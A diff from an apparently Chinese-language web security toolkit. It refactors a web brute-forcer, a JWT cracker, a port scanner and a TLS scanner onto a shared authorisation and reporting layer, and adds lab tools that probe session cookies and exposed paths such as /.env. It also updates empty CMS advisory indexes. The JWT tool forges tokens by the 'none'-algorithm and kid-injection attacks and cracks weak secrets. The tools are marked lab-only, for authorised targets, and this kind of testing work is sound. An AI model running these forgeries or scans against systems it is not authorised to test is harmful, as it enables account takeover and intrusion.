args=args,
)
text_lines = [
"=" * 60,
"Web Brute Force Tool",
"=" * 60,
f"Target: {args.url}",
f"Attempts: {bruteforcer.attempts}",
f"Elapsed: {elapsed:.2f}s",
f"Hits: {len(results)}",
f"Status: {status}",
]
emit_report(args, report, text_lines)
if __name__ == "__main__":

126
03-authentication/jwt/tools/jwt-cracker.py
查看文件

@@ -30,6 +30,16 @@ import time
from typing import Dict, Optional, Tuple, List
import sys
import re
from pathlib import Path
import contextlib
import io
SCRIPTS_DIR = Path(__file__).resolve().parents[2] / "scripts"
if str(SCRIPTS_DIR) not in sys.path:
sys.path.insert(0, str(SCRIPTS_DIR))
from tool_contract import add_common_args, emit_report, ensure_authorized, make_report, write_evidence # noqa: E402
class Colors:
@@ -307,57 +317,33 @@ def main():
parser.add_argument("--kid-injection", default="/dev/null", help="KID 注入值")
parser.add_argument("--analyze", action="store_true", help="分析 JWT")
parser.add_argument("-v", "--verbose", action="store_true", help="详细输出")
add_common_args(parser, include_network=False)
args = parser.parse_args()
ensure_authorized(args, parser)
cracker = JWTCracker()
print(f"\n{Colors.BOLD}{'=' * 60}{Colors.END}")
print(f"{Colors.BOLD}JWT Cracker & Analyzer{Colors.END}")
print(f"{Colors.BOLD}{'=' * 60}{Colors.END}\n")
try:
header, payload, _ = cracker.decode(args.token)
print(f"{Colors.CYAN}Header:{Colors.END}")
print(f" {json.dumps(header, indent=2)}")
print(f"\n{Colors.CYAN}Payload:{Colors.END}")
print(f" {json.dumps(payload, indent=2)}")
if args.format == "text":
print(f"{Colors.CYAN}Header:{Colors.END}")
print(f" {json.dumps(header, indent=2)}")
print(f"\n{Colors.CYAN}Payload:{Colors.END}")
print(f" {json.dumps(payload, indent=2)}")
except Exception as e:
cracker.print_result("ERROR", str(e))
sys.exit(1)
if args.analyze:
print(f"\n{Colors.CYAN}Analysis:{Colors.END}")
analysis = cracker.analyze(args.token)
if "issues" in analysis:
for issue in analysis["issues"]:
color = (
Colors.RED
if issue["severity"] == "HIGH"
else Colors.YELLOW
if issue["severity"] == "MEDIUM"
else Colors.BLUE
)
print(f" {color}[{issue['severity']}]{Colors.END} {issue['issue']}")
print(f" {issue['description']}")
if args.attack:
print(f"\n{Colors.CYAN}Attack: {args.attack}{Colors.END}")
if args.attack == "none":
forged = cracker.attack_none_algorithm(args.token)
cracker.print_result("SUCCESS", f"Forged Token (none): {forged}")
elif args.attack == "kid":
forged = cracker.attack_kid_injection(args.token, args.kid_injection)
cracker.print_result("SUCCESS", f"Forged Token (kid): {forged}")
elif args.attack == "confusion":
forged = cracker.attack_algorithm_confusion(args.token)
cracker.print_result("INFO", "需要公钥来利用算法混淆攻击")
analysis = cracker.analyze(args.token) if args.analyze else {"issues": []}
forged = None
if args.attack == "none":
forged = cracker.attack_none_algorithm(args.token)
elif args.attack == "kid":
forged = cracker.attack_kid_injection(args.token, args.kid_injection)
elif args.attack == "confusion":
forged = cracker.attack_algorithm_confusion(args.token)
wordlist = None
if args.wordlist:
@@ -368,24 +354,62 @@ def main():
cracker.print_result("ERROR", f"字典文件不存在: {args.wordlist}")
sys.exit(1)
print(f"\n{Colors.CYAN}Cracking...{Colors.END}")
stdout_buffer = io.StringIO()
capture = contextlib.redirect_stdout(stdout_buffer) if args.format != "text" else contextlib.nullcontext()
start = time.time()
secret = cracker.crack(args.token, wordlist, args.verbose)
with capture:
secret = cracker.crack(args.token, wordlist, args.verbose and args.format == "text")
elapsed = time.time() - start
if secret:
cracker.print_result("FOUND", f"密钥破解成功: {secret}")
cracker.print_result("INFO", f"耗时: {elapsed:.2f}s")
forged = cracker.encode(header, payload, secret, header.get("alg", "HS256"))
cracker.print_result("SUCCESS", f"可以伪造任意 Token")
else:
cracker.print_result(
"WARNING",
f"未能破解密钥 (尝试了 {len(wordlist) if wordlist else len(cracker.common_secrets)} 个)",
)
print(f"\n{Colors.BOLD}{'=' * 60}{Colors.END}\n")
evidence_refs = []
ref = write_evidence(
args,
"jwt-analysis.json",
{
"header": header,
"payload": payload,
"analysis": analysis,
"attack": args.attack,
"secret_found": bool(secret),
"captured_stdout": stdout_buffer.getvalue()[-1000:],
},
)
if ref:
evidence_refs.append(ref)
status = "verified" if secret or forged else "needs-review"
severity = "high" if secret else "medium" if analysis.get("issues") else "info"
report = make_report(
tool="jwt-cracker",
mode="jwt-analysis-and-weak-secret-test",
target="jwt-token",
status=status,
severity=severity,
payload_or_probe={
"header": header,
"payload_keys": sorted(payload.keys()),
"issues": analysis.get("issues", []),
"attack": args.attack,
"secret_found": bool(secret),
},
request_summary={"wordlist": args.wordlist or "builtin-common", "elapsed_seconds": round(elapsed, 2)},
evidence_refs=evidence_refs,
destructive_risk="low",
args=args,
extra={"forged_token_present": bool(forged)},
)
text_lines = [
"=" * 60,
"JWT Cracker & Analyzer",
"=" * 60,
f"Token Alg: {header.get('alg', 'unknown')}",
f"Issues: {len(analysis.get('issues', []))}",
f"Secret Found: {'yes' if secret else 'no'}",
f"Status: {status}",
]
emit_report(args, report, text_lines)
if __name__ == "__main__":

99
03-authentication/session/tools/session-lab.py 普通文件
查看文件

@@ -0,0 +1,99 @@
#!/usr/bin/env python3
"""
Session / Token Boundary Lab Tool
LAB ONLY | AUTHORIZED TARGETS ONLY
"""
from __future__ import annotations
import argparse
import re
import sys
from pathlib import Path
from typing import Any, Dict, List
import requests
SCRIPTS_DIR = Path(__file__).resolve().parents[3] / "scripts"
if str(SCRIPTS_DIR) not in sys.path:
sys.path.insert(0, str(SCRIPTS_DIR))
from tool_contract import add_common_args, emit_report, ensure_authorized, make_report, parse_headers, write_evidence # noqa: E402
COOKIE_ATTRS = ["HttpOnly", "Secure", "SameSite", "Path", "Domain"]
STORAGE_PATTERNS = {
"localStorage": re.compile(r"localStorage\.(setItem|getItem)|window\.localStorage", re.I),
"sessionStorage": re.compile(r"sessionStorage\.(setItem|getItem)|window\.sessionStorage", re.I),
"token-ish": re.compile(r"(jwt|token|authorization|bearer)", re.I),
}
def analyze(target: str, timeout: float, headers: Dict[str, str]) -> Dict[str, Any]:
response = requests.get(target, timeout=timeout, headers=headers, verify=False)
cookies = []
for raw in response.headers.get("Set-Cookie", "").split(","):
raw = raw.strip()
if not raw:
continue
attrs = {attr: (attr.lower() in raw.lower()) for attr in COOKIE_ATTRS}
cookies.append({"raw": raw[:300], "attributes": attrs})
storage_hits = []
for name, pattern in STORAGE_PATTERNS.items():
if pattern.search(response.text):
storage_hits.append(name)
suspicious_headers = []
for name in ["Set-Cookie", "Authorization", "X-Forwarded-User", "X-Original-URL"]:
if response.headers.get(name):
suspicious_headers.append({"name": name, "value": response.headers.get(name)[:200]})
return {
"status_code": response.status_code,
"cookies": cookies,
"storage_hits": storage_hits,
"suspicious_headers": suspicious_headers,
"body_excerpt": response.text[:600],
}
def main() -> int:
parser = argparse.ArgumentParser(description="Session / Token Boundary Lab Tool")
parser.add_argument("--target", required=True, help="目标 URL")
parser.add_argument("--timeout", type=float, default=8.0, help="请求超时时间")
add_common_args(parser)
args = parser.parse_args()
ensure_authorized(args, parser)
headers = parse_headers(args.header)
findings = analyze(args.target, args.timeout, headers)
evidence_refs = []
ref = write_evidence(args, "session-lab.json", findings)
if ref:
evidence_refs.append(ref)
suspicious = len(findings["cookies"]) + len(findings["storage_hits"]) + len(findings["suspicious_headers"])
report = make_report(
tool="session-lab",
mode="cookie-storage-session-boundary-check",
target=args.target,
status="verified" if suspicious else "needs-review",
severity="medium" if suspicious else "info",
payload_or_probe=findings,
request_summary={"timeout": args.timeout, "header_names": sorted(headers.keys())},
evidence_refs=evidence_refs,
destructive_risk="low",
args=args,
)
text_lines = [
"=" * 60,
"Session / Token Boundary Lab Tool",
"=" * 60,
f"Target: {args.target}",
f"Cookie Findings: {len(findings['cookies'])}",
f"Storage Hits: {len(findings['storage_hits'])}",
f"Suspicious Headers: {len(findings['suspicious_headers'])}",
]
return emit_report(args, report, text_lines)
if __name__ == "__main__":
raise SystemExit(main())

34
04-server-security/infrastructure/tools/site-scope-mapper.py
查看文件

@@ -30,13 +30,22 @@ import socket
import ssl
import warnings
from dataclasses import asdict, dataclass, field
from pathlib import Path
from typing import Dict, List, Optional, Set
import sys
warnings.filterwarnings("ignore", message="urllib3 v2 only supports OpenSSL")
import requests
SCRIPTS_DIR = Path(__file__).resolve().parents[2] / "scripts"
if str(SCRIPTS_DIR) not in sys.path:
sys.path.insert(0, str(SCRIPTS_DIR))
from tool_contract import add_common_args, emit_report, make_report, write_evidence # noqa: E402
DEFAULT_PORTS = [80, 443, 8080, 8443]
@@ -226,6 +235,7 @@ def main() -> int:
action="store_true",
help="确认目标属于自有资产或已明确授权",
)
add_common_args(parser, include_network=False)
args = parser.parse_args()
if not args.ack_authorized:
@@ -267,11 +277,25 @@ def main() -> int:
"related_hosts": sorted(related_hosts),
}
if args.json:
print(json.dumps(report, indent=2, ensure_ascii=True))
else:
print(render_text(report))
return 0
evidence_refs = []
ref = write_evidence(args, "site-scope-map.json", report)
if ref:
evidence_refs.append(ref)
payload = make_report(
tool="site-scope-mapper",
mode="single-target-scope-map",
target=args.target,
status="verified" if report["http"] or report["tls"] else "needs-review",
severity="low",
payload_or_probe=report,
request_summary={"ports": ports, "target_type": target_type},
evidence_refs=evidence_refs,
destructive_risk="low",
args=args,
)
if args.json and args.format == "text":
args.format = "json"
return emit_report(args, payload, render_text(report).splitlines())
if __name__ == "__main__":

96
04-server-security/misconfiguration/tools/misconfig-lab.py 普通文件
查看文件

@@ -0,0 +1,96 @@
#!/usr/bin/env python3
"""
Misconfiguration Lab Tool
LAB ONLY | AUTHORIZED TARGETS ONLY
"""
from __future__ import annotations
import argparse
import sys
from pathlib import Path
from typing import Any, Dict, List
from urllib.parse import urljoin
import requests
SCRIPTS_DIR = Path(__file__).resolve().parents[3] / "scripts"
if str(SCRIPTS_DIR) not in sys.path:
sys.path.insert(0, str(SCRIPTS_DIR))
from tool_contract import add_common_args, emit_report, ensure_authorized, make_report, parse_headers, write_evidence # noqa: E402
DEFAULT_PATHS = [
"/.env",
"/server-status",
"/actuator/health",
"/swagger-ui.html",
"/phpinfo.php",
"/admin/",
"/debug",
]
def probe(target: str, timeout: float, headers: Dict[str, str]) -> List[Dict[str, Any]]:
results = []
for path in DEFAULT_PATHS:
url = urljoin(target if target.endswith("/") else target + "/", path.lstrip("/"))
try:
response = requests.get(url, timeout=timeout, headers=headers, verify=False)
results.append(
{
"path": path,
"url": url,
"status_code": response.status_code,
"server": response.headers.get("Server"),
"content_type": response.headers.get("Content-Type"),
"body_excerpt": response.text[:300],
}
)
except Exception as exc:
results.append({"path": path, "url": url, "error": str(exc)})
return results
def main() -> int:
parser = argparse.ArgumentParser(description="Misconfiguration Lab Tool")
parser.add_argument("--target", required=True, help="目标 URL")
parser.add_argument("--timeout", type=float, default=8.0, help="请求超时时间")
add_common_args(parser)
args = parser.parse_args()
ensure_authorized(args, parser)
headers = parse_headers(args.header)
results = probe(args.target, args.timeout, headers)
evidence_refs = []
ref = write_evidence(args, "misconfig-lab.json", {"results": results})
if ref:
evidence_refs.append(ref)
suspicious = [item for item in results if item.get("status_code") in {200, 401, 403}]
report = make_report(
tool="misconfig-lab",
mode="misconfiguration-surface-check",
target=args.target,
status="verified" if suspicious else "needs-review",
severity="medium" if suspicious else "info",
payload_or_probe={"results": results, "suspicious": suspicious},
request_summary={"timeout": args.timeout, "paths": DEFAULT_PATHS},
evidence_refs=evidence_refs,
destructive_risk="low",
args=args,
)
text_lines = [
"=" * 60,
"Misconfiguration Lab Tool",
"=" * 60,
f"Target: {args.target}",
f"Paths Checked: {len(DEFAULT_PATHS)}",
f"Suspicious Responses: {len(suspicious)}",
]
return emit_report(args, report, text_lines)
if __name__ == "__main__":
raise SystemExit(main())

55
04-server-security/scanning/tools/port-scanner.py
查看文件

@@ -27,6 +27,14 @@ import time
from concurrent.futures import ThreadPoolExecutor, as_completed
from typing import List, Dict, Tuple, Optional
import sys
from pathlib import Path
SCRIPTS_DIR = Path(__file__).resolve().parents[2] / "scripts"
if str(SCRIPTS_DIR) not in sys.path:
sys.path.insert(0, str(SCRIPTS_DIR))
from tool_contract import add_common_args, emit_report, ensure_authorized, make_report, write_evidence # noqa: E402
class Colors:
@@ -229,37 +237,54 @@ def main():
parser.add_argument("-t", "--threads", type=int, default=100, help="线程数")
parser.add_argument("--timeout", type=float, default=1.0, help="超时时间")
parser.add_argument("-v", "--verbose", action="store_true", help="详细输出")
add_common_args(parser, include_network=False)
args = parser.parse_args()
ensure_authorized(args, parser)
scanner = PortScanner(threads=args.threads, timeout=args.timeout)
if args.format != "text":
scanner.print_result = lambda *_args, **_kwargs: None # type: ignore[assignment]
if args.top_ports:
ports = scanner.top_ports[: args.top_ports]
else:
ports = scanner.parse_ports(args.ports)
print(f"\n{Colors.BOLD}{'=' * 60}{Colors.END}")
print(f"{Colors.BOLD}Port Scanner{Colors.END}")
print(f"{Colors.BOLD}{'=' * 60}{Colors.END}\n")
scanner.print_result("INFO", f"目标: {args.host}")
scanner.print_result("INFO", f"端口: {len(ports)}")
scanner.print_result("INFO", f"线程: {args.threads}")
results = scanner.scan_host(args.host, ports, args.verbose)
print(f"\n{Colors.BOLD}{'=' * 60}{Colors.END}")
if results:
scanner.print_result("SUCCESS", f"发现 {len(results)} 个开放端口:")
print(f"\n{'PORT':<10} {'SERVICE':<15} {'BANNER'}")
print("-" * 60)
for r in sorted(results, key=lambda x: x["port"]):
banner = r["banner"][:40] if r["banner"] else r["service"]
print(f"{r['port']:<10} {r['service']:<15} {banner}")
else:
scanner.print_result("INFO", "未发现开放端口")
print(f"{Colors.BOLD}{'=' * 60}{Colors.END}\n")
evidence_refs = []
ref = write_evidence(args, "port-scan-results.json", {"results": results, "ports": ports})
if ref:
evidence_refs.append(ref)
status = "verified" if results else "needs-review"
severity = "medium" if results else "info"
report = make_report(
tool="port-scanner",
mode="minimal-port-scan",
target=args.host,
status=status,
severity=severity,
payload_or_probe={"ports": ports, "open_ports": results},
request_summary={"threads": args.threads, "timeout": args.timeout},
evidence_refs=evidence_refs,
destructive_risk="low",
args=args,
)
text_lines = [
"=" * 60,
"Port Scanner",
"=" * 60,
f"Target: {args.host}",
f"Ports Checked: {len(ports)}",
f"Open Ports: {len(results)}",
f"Status: {status}",
]
emit_report(args, report, text_lines)
if __name__ == "__main__":

97
04-server-security/tls/tools/tls-scanner.py
查看文件

@@ -26,6 +26,14 @@ import re
from typing import Dict, List, Tuple, Optional
from datetime import datetime
import sys
from pathlib import Path
SCRIPTS_DIR = Path(__file__).resolve().parents[2] / "scripts"
if str(SCRIPTS_DIR) not in sys.path:
sys.path.insert(0, str(SCRIPTS_DIR))
from tool_contract import add_common_args, emit_report, ensure_authorized, make_report, write_evidence # noqa: E402
class Colors:
@@ -271,74 +279,45 @@ def main():
parser.add_argument("-u", "--url", required=True, help="目标 URL 或主机名")
parser.add_argument("-p", "--port", type=int, default=443, help="端口 (默认: 443)")
parser.add_argument("--timeout", type=int, default=10, help="超时时间")
add_common_args(parser, include_network=False)
args = parser.parse_args()
ensure_authorized(args, parser)
hostname = args.url.replace("https://", "").replace("http://", "").split("/")[0]
scanner = TLSScanner(timeout=args.timeout)
print(f"\n{Colors.BOLD}{'=' * 60}{Colors.END}")
print(f"{Colors.BOLD}TLS Scanner{Colors.END}")
print(f"{Colors.BOLD}{'=' * 60}{Colors.END}\n")
scanner.print_result("INFO", f"目标: {hostname}:{args.port}")
print(f"\n{Colors.CYAN}[*] 扫描协议支持...{Colors.END}")
results = scanner.scan(hostname, args.port)
print(f"\n{Colors.CYAN}协议支持:{Colors.END}")
for proto, supported in results["protocols"].items():
status = (
f"{Colors.GREEN}支持{Colors.END}"
if supported
else f"{Colors.RED}不支持{Colors.END}"
)
if supported and proto in ["SSLv2", "SSLv3"]:
status = f"{Colors.RED}支持 (不安全){Colors.END}"
elif supported and proto in ["TLSv1.0", "TLSv1.1"]:
status = f"{Colors.YELLOW}支持 (过时){Colors.END}"
print(f" {proto:<10} {status}")
if results["cipher"]:
print(f"\n{Colors.CYAN}当前密码套件:{Colors.END}")
cipher_name, cipher_proto, cipher_bits = results["cipher"]
print(f" 名称: {cipher_name}")
print(f" 协议: {cipher_proto}")
print(f" 密钥长度: {cipher_bits} bits")
if results["certificate"]:
print(f"\n{Colors.CYAN}证书信息:{Colors.END}")
cert = results["certificate"]
print(f" 主题: {cert['subject'].get('commonName', 'N/A')}")
print(f" 颁发者: {cert['issuer'].get('commonName', 'N/A')}")
print(f" 有效期: {cert['not_before']} - {cert['not_after']}")
print(f"\n{Colors.CYAN}HSTS:{Colors.END}")
if results["hsts"]["enabled"]:
print(f" 状态: {Colors.GREEN}已启用{Colors.END}")
print(f" Max-Age: {results['hsts']['max_age']}")
print(
f" IncludeSubDomains: {'' if results['hsts']['include_subdomains'] else ''}"
)
print(f" Preload: {'' if results['hsts']['preload'] else ''}")
else:
print(f" 状态: {Colors.RED}未启用{Colors.END}")
print(f"\n{Colors.CYAN}安全问题:{Colors.END}")
if results["issues"]:
for issue in sorted(results["issues"], key=lambda x: x["severity"]):
color = (
Colors.RED
if issue["severity"] in ["CRITICAL", "HIGH"]
else Colors.YELLOW
)
print(f" {color}[{issue['severity']}]{Colors.END} {issue['issue']}")
print(f" 建议: {issue['recommendation']}")
else:
print(f" {Colors.GREEN}未发现安全问题{Colors.END}")
print(f"\n{Colors.BOLD}{'=' * 60}{Colors.END}\n")
evidence_refs = []
ref = write_evidence(args, "tls-results.json", results)
if ref:
evidence_refs.append(ref)
severity = "high" if any(issue["severity"] in ["CRITICAL", "HIGH"] for issue in results["issues"]) else "medium" if results["issues"] else "info"
status = "verified" if results["issues"] else "needs-review"
report = make_report(
tool="tls-scanner",
mode="tls-readonly-check",
target=f"{hostname}:{args.port}",
status=status,
severity=severity,
payload_or_probe={"issues": results["issues"], "protocols": results["protocols"], "hsts": results["hsts"]},
request_summary={"timeout": args.timeout, "certificate_present": bool(results["certificate"])},
evidence_refs=evidence_refs,
destructive_risk="low",
args=args,
)
text_lines = [
"=" * 60,
"TLS Scanner",
"=" * 60,
f"Target: {hostname}:{args.port}",
f"Issues: {len(results['issues'])}",
f"HSTS Enabled: {'yes' if results['hsts']['enabled'] else 'no'}",
f"Status: {status}",
]
emit_report(args, report, text_lines)
if __name__ == "__main__":

12
07-framework-security/cms/directus/INDEX.md
查看文件

@@ -8,7 +8,11 @@
- 总案例数: `0`
- 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00`
- 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:45+00:00`
## 目标约束
@@ -25,6 +29,6 @@
## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - |
| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |

12
07-framework-security/cms/discourse/INDEX.md
查看文件

@@ -8,7 +8,11 @@
- 总案例数: `0`
- 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00`
- 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:45+00:00`
## 目标约束
@@ -25,6 +29,6 @@
## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - |
| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |

12
07-framework-security/cms/drupal/INDEX.md
查看文件

@@ -8,7 +8,11 @@
- 总案例数: `0`
- 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00`
- 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:45+00:00`
## 目标约束
@@ -26,6 +30,6 @@
## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - |
| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |

12
07-framework-security/cms/ghost/INDEX.md
查看文件

@@ -8,7 +8,11 @@
- 总案例数: `0`
- 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00`
- 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:45+00:00`
## 目标约束
@@ -25,6 +29,6 @@
## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - |
| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |

12
07-framework-security/cms/joomla/INDEX.md
查看文件

@@ -8,7 +8,11 @@
- 总案例数: `0`
- 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00`
- 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:45+00:00`
## 目标约束
@@ -25,6 +29,6 @@
## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - |
| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |

12
07-framework-security/cms/mediawiki/INDEX.md
查看文件

@@ -8,7 +8,11 @@
- 总案例数: `0`
- 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00`
- 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:45+00:00`
## 目标约束
@@ -25,6 +29,6 @@
## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - |
| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |

12
07-framework-security/cms/moodle/INDEX.md
查看文件

@@ -8,7 +8,11 @@
- 总案例数: `0`
- 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00`
- 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:45+00:00`
## 目标约束
@@ -25,6 +29,6 @@
## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - |
| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |

12
07-framework-security/cms/strapi/INDEX.md
查看文件

@@ -8,7 +8,11 @@
- 总案例数: `0`
- 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00`
- 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:45+00:00`
## 目标约束
@@ -25,6 +29,6 @@
## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - |
| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |

12
07-framework-security/cms/wordpress/INDEX.md
查看文件

@@ -8,7 +8,11 @@
- 总案例数: `0`
- 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00`
- 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:45+00:00`
## 目标约束
@@ -29,6 +33,6 @@
## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - |
| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |

12
07-framework-security/ecommerce/adobe-commerce/INDEX.md
查看文件

@@ -8,7 +8,11 @@
- 总案例数: `0`
- 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00`
- 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:45+00:00`
## 目标约束
@@ -26,6 +30,6 @@
## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - |
| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |

12
07-framework-security/ecommerce/magento-open-source/INDEX.md
查看文件

@@ -8,7 +8,11 @@
- 总案例数: `0`
- 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00`
- 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:45+00:00`
## 目标约束
@@ -26,6 +30,6 @@
## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - |
| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |

12
07-framework-security/ecommerce/medusa/INDEX.md
查看文件

@@ -8,7 +8,11 @@
- 总案例数: `0`
- 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00`
- 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:45+00:00`
## 目标约束
@@ -25,6 +29,6 @@
## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - |
| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |

12
07-framework-security/ecommerce/opencart/INDEX.md
查看文件

@@ -8,7 +8,11 @@
- 总案例数: `0`
- 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00`
- 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:45+00:00`
## 目标约束
@@ -25,6 +29,6 @@
## 案例列表
